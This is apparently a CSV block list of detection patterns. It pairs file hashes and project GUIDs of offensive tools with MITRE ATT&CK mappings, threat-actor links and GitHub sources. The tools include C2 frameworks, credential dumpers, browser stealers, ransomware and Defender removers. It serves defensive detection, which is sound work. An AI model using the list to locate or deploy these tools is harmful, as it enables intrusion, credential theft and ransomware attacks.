"*e6ea83ec183d2123c354aa88cc300927ab7fa5a99e9201e01c85caace559a536*",".{0,1000}e6ea83ec183d2123c354aa88cc300927ab7fa5a99e9201e01c85caace559a536.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42219"
"*e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf*",".{0,1000}e6f1d80937b4c202ff8f79e77bfa5cbadc0a42975234f981b0b85dd7c8aa75cf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42220"
"*e6f2b9e53c7e38b725dd5605fb1d6527128bfe0f9a17ef305505bdc7a0771a79*",".{0,1000}e6f2b9e53c7e38b725dd5605fb1d6527128bfe0f9a17ef305505bdc7a0771a79.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42221"
"*e6feac10da1244ba8ab1bfaf6eb2a60ba4d4f016dc1fad06df3e19d1ce318c7a*",".{0,1000}e6feac10da1244ba8ab1bfaf6eb2a60ba4d4f016dc1fad06df3e19d1ce318c7a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42223"
"*e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70*",".{0,1000}e704bd6ebe126565b2334547aac8ef9bfcd9e3ec5ccf59b6e86d5b857610aa70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42224"
"*e70c4d485153cf47b9dde0d1124b48e929e9838e241956b0062fafcd51a2f4f6*",".{0,1000}e70c4d485153cf47b9dde0d1124b48e929e9838e241956b0062fafcd51a2f4f6.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","42226"
"*e71047adb4f65d8d038262c8a288feb4061ec2b2dc30a4a6d168f7c0ae8c3e23*",".{0,1000}e71047adb4f65d8d038262c8a288feb4061ec2b2dc30a4a6d168f7c0ae8c3e23.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","42227"
"*e71047e3345b665cafc213f16980ff93ff6a31ed242b32ab08884eb8298ea623*",".{0,1000}e71047e3345b665cafc213f16980ff93ff6a31ed242b32ab08884eb8298ea623.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","42228"
"*e71c92b2228f78010d91f373ea3c1ed474c0b6298c3b9615edf9edb42be35abb*",".{0,1000}e71c92b2228f78010d91f373ea3c1ed474c0b6298c3b9615edf9edb42be35abb.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","42231"
"*e71cda5e7c018f18aefcdfbce171cfeee7b8d556e5036d8b8f0864efc5f2156b*",".{0,1000}e71cda5e7c018f18aefcdfbce171cfeee7b8d556e5036d8b8f0864efc5f2156b.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42232"
"*e71d6323db9dd7f3333d32a1fd6675108150e12a8d8769ccb8e38628a9a1aa3d*",".{0,1000}e71d6323db9dd7f3333d32a1fd6675108150e12a8d8769ccb8e38628a9a1aa3d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42233"
"*e721518ae125d596d4f5148ac0e7cc08d8b9efd62ce6d874fd5958e92b50346a*",".{0,1000}e721518ae125d596d4f5148ac0e7cc08d8b9efd62ce6d874fd5958e92b50346a.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","#filehash","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","42234"
"*E731C71B-4D1B-4BE7-AA4D-EDA52AF7F256*",".{0,1000}E731C71B\-4D1B\-4BE7\-AA4D\-EDA52AF7F256.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","#GUIDproject","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","42236"
"*e732db692f0686f1a3118614deda581f692219020f73e9728c9c9ead0ae50836*",".{0,1000}e732db692f0686f1a3118614deda581f692219020f73e9728c9c9ead0ae50836.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42238"
"*e734ae00fba8f7857b092bb723980990dc905c521d8f4500f74a202634190bc2*",".{0,1000}e734ae00fba8f7857b092bb723980990dc905c521d8f4500f74a202634190bc2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42239"
"*e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a*",".{0,1000}e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","#filehash","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","42240"
"*e74146d0354389935edf4ef0dcfdf659572b1444db54f08cf0c7ade206fee3c5*",".{0,1000}e74146d0354389935edf4ef0dcfdf659572b1444db54f08cf0c7ade206fee3c5.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","42243"
"*e74ae54ecb8e0faeb06dc7f1a78bbdaf9facc8540b8b6ee404061fadad0da2de*",".{0,1000}e74ae54ecb8e0faeb06dc7f1a78bbdaf9facc8540b8b6ee404061fadad0da2de.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42246"
"*e74bb25e61d959049d06ff838d2147b291dcffe3e96ad0af68077cd9f50d2e82*",".{0,1000}e74bb25e61d959049d06ff838d2147b291dcffe3e96ad0af68077cd9f50d2e82.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42247"
"*e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a*",".{0,1000}e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42248"
"*e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f*",".{0,1000}e75171190134063cc579d897bd1bd45370e3616b134398d239491c6382d3775f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42250"
"*e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d*",".{0,1000}e754181c7e46930dab3fab1056569be0f6fa13cbdc77a87e91ee5c4bc83f658d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42251"
"*e7542c38e0b979f920fb88b59b25c3d6ae433ca145f7758938b322a71accecae*",".{0,1000}e7542c38e0b979f920fb88b59b25c3d6ae433ca145f7758938b322a71accecae.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42252"
"*e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e*",".{0,1000}e75d251f639cc70aba21e621c2710dc3ee9dc15d1a677a157f83c14e9aff5f8e.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","42253"
"*e7623b80e9b89fcbd900c11d16445e052c38c52cfd7bf5954a9c373679e07d5e*",".{0,1000}e7623b80e9b89fcbd900c11d16445e052c38c52cfd7bf5954a9c373679e07d5e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42254"
"*e7670b3696d9013f88d2bc0f35aed4df5fa68d30fecb7aca4a33511b76c4286f*",".{0,1000}e7670b3696d9013f88d2bc0f35aed4df5fa68d30fecb7aca4a33511b76c4286f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42255"
"*e7697645f36de5978c1b640b6b3fc819e55b00ee8d9e9798919c11cc7a6fc88b*",".{0,1000}e7697645f36de5978c1b640b6b3fc819e55b00ee8d9e9798919c11cc7a6fc88b.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","#filehash","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","42256"
"*e7711f13b26f4b8f260587592d92f5d04e4aec5124896a35f082b69785e51d26*",".{0,1000}e7711f13b26f4b8f260587592d92f5d04e4aec5124896a35f082b69785e51d26.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","42259"
"*e771b4d016aa48c035fe6635758dcb84423b591684e1e952075b5eb998c91c1e*",".{0,1000}e771b4d016aa48c035fe6635758dcb84423b591684e1e952075b5eb998c91c1e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42260"
"*E776B801-614D-4E3C-A446-5A35B0CF3D08*",".{0,1000}E776B801\-614D\-4E3C\-A446\-5A35B0CF3D08.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","42261"
"*e786a45fe464db32262fe83cdefe7728a80c9eb74ff27116b95ab944847f3de4*",".{0,1000}e786a45fe464db32262fe83cdefe7728a80c9eb74ff27116b95ab944847f3de4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42263"
"*e789ae7e1cf64b173de4ab20baed15152b937231db44bab8482f68f08b02a000*",".{0,1000}e789ae7e1cf64b173de4ab20baed15152b937231db44bab8482f68f08b02a000.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42264"
"*e7935d85498c24998f18b6c34083d44504c2f35481d8ced208e7167ca74f46c8*",".{0,1000}e7935d85498c24998f18b6c34083d44504c2f35481d8ced208e7167ca74f46c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42265"
"*e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5*",".{0,1000}e793dfecc85224131dd071a5ff7b9ea7c01156879879701951152090bab15ac5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42266"
"*e7968efd71cb275ba11fb0bad1567611afe86181401a4c05d35516c76c5e3ca4*",".{0,1000}e7968efd71cb275ba11fb0bad1567611afe86181401a4c05d35516c76c5e3ca4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42267"
"*e79c6e7acdccaefe648166249c67a7c53a9783940f51ea7d4bb2817d684cf12a*",".{0,1000}e79c6e7acdccaefe648166249c67a7c53a9783940f51ea7d4bb2817d684cf12a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42268"
"*e79c8cadd9b100cb8c9efcc4c67bf33049a4423c08c083913f03e53024e7b3d6*",".{0,1000}e79c8cadd9b100cb8c9efcc4c67bf33049a4423c08c083913f03e53024e7b3d6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42269"
"*e79fd8cb2cbebc663abc7cc9d9be28033ab53a4f1398ffcb5ca0331d2a8a6a26*",".{0,1000}e79fd8cb2cbebc663abc7cc9d9be28033ab53a4f1398ffcb5ca0331d2a8a6a26.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42270"
"*e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172*",".{0,1000}e7a9855e85e1d0040e342e54182576f7f12e7f7fbe0debe50cc434f8215f0172.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42271"
"*e7b05678d111dcc2cd46fbe74c7febad2d3a51121bbecb11852e69d332489b22*",".{0,1000}e7b05678d111dcc2cd46fbe74c7febad2d3a51121bbecb11852e69d332489b22.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42276"
"*e7b3627d04efe0c3b201656b9bda35df126551dfb3eb47b506e1238bcc4b2ffe*",".{0,1000}e7b3627d04efe0c3b201656b9bda35df126551dfb3eb47b506e1238bcc4b2ffe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42278"
"*e7bd6debd460c7b76bf0f743473f741b095d9410f063063b39537f2d01928e2f*",".{0,1000}e7bd6debd460c7b76bf0f743473f741b095d9410f063063b39537f2d01928e2f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42279"
"*E7BFFEE1-07C1-452C-8AF8-6AD30B1844FF*",".{0,1000}E7BFFEE1\-07C1\-452C\-8AF8\-6AD30B1844FF.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#GUIDproject","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","42280"
"*e7c25239e8189e366ad1b7699209f52e99833fc52965b428c0ba9e55cef9791f*",".{0,1000}e7c25239e8189e366ad1b7699209f52e99833fc52965b428c0ba9e55cef9791f.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","42281"
"*e7c8fc74e31020a6c52c225c143a58c1243ec86e00fcd9038b8194418f8e3603*",".{0,1000}e7c8fc74e31020a6c52c225c143a58c1243ec86e00fcd9038b8194418f8e3603.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","42283"
"*e7c9a0a34bad12057b3c39fb42106b7e095d8b64e9b68010ca8cf516a908c262*",".{0,1000}e7c9a0a34bad12057b3c39fb42106b7e095d8b64e9b68010ca8cf516a908c262.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","42284"
"*e7cad48e4b68862af0309de0646b0225fa1f7bb183fc8cfc8dfd0e254364c59a*",".{0,1000}e7cad48e4b68862af0309de0646b0225fa1f7bb183fc8cfc8dfd0e254364c59a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42285"
"*e7ccd3ab3e214e8dd902bf044b6de4e5cf03f6db68476995d5cd02ba4e91067a*",".{0,1000}e7ccd3ab3e214e8dd902bf044b6de4e5cf03f6db68476995d5cd02ba4e91067a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42286"
